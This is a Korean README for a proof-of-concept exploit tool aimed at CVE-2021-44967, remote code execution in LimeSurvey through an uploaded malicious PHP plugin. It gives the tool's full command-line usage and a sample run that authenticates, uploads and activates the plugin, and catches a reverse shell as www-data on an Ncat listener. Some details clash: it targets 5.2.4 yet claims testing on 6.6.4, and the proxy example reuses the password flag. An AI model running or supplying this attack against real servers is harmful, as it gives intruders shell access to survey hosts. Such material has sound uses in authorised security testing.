
CVE-2021-44967에 대한 개념 증명(PoC) 익스플로잇으로, LimeSurvey 5.2.4에서 악성 플러그인 업로드를 통해 원격 코드 실행을 가능하게 하며 리버스 셸 기능을 포함합니다.
이 Proof-of-Concept (POC)는 CVE-2021-44967을 악용하여 관리자 권한으로 악성 LimeSurvey PHP 플러그인을 업로드 및 실행하여 리버스 셸을 획득하는 데 사용될 수 있습니다.
LimeSurvey 5.2.4의 플러그인 업로드 및 설치 기능을 통해 원격 코드 실행(RCE) 취약점이 존재하며, 원격의 악의적인 사용자가 임의의 PHP 코드 파일을 업로드할 수 있습니다.
심각도: 8.3 HIGH 벡터: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
usage: limesurvey_rce.py [-h] -t URL -u USERNAME -p PASSWORD [-f FILE] [--listen-ip LISTEN_IP] [--listen-port LISTEN_PORT] [--threads THREADS] [--sleep-time SLEEP_TIME] [--row ROW]
[--length LENGTH] [-a USERAGENT] [-x PROXY] [-v]
POC for CVE-2021-44967 (LimeSurvey RCE)
options:
-h, --help show this help message and exit
-t, --url URL LimeSurvey Target URL
-u, --username USERNAME
LimeSurvey username
-p, --password PASSWORD
LimeSurvey password
-f, --file FILE Custom PHP payload file
--listen-ip LISTEN_IP
Listening IP / Interface
--listen-port LISTEN_PORT
Listening Port
-a, --useragent USERAGENT
User agent to use when sending requests
-x, --proxy PROXY HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
-v, --verbose Verbosity enabled - additional output flag
python3 limesurvey_rce.py -t https://TARGET/ -u 'USERNAME' -p 'PASSWORD'
[*] Authenticating ...
[+] Login successful!
[*] Uploading plugin ...
[*] Activating plugin ...
[*] Starting listener and sending reverse shelll ...
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from X.X.X.X:51004.
www-data@target:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
LimeSurvey Community Edition 버전 6.6.4에서 테스트되었습니다.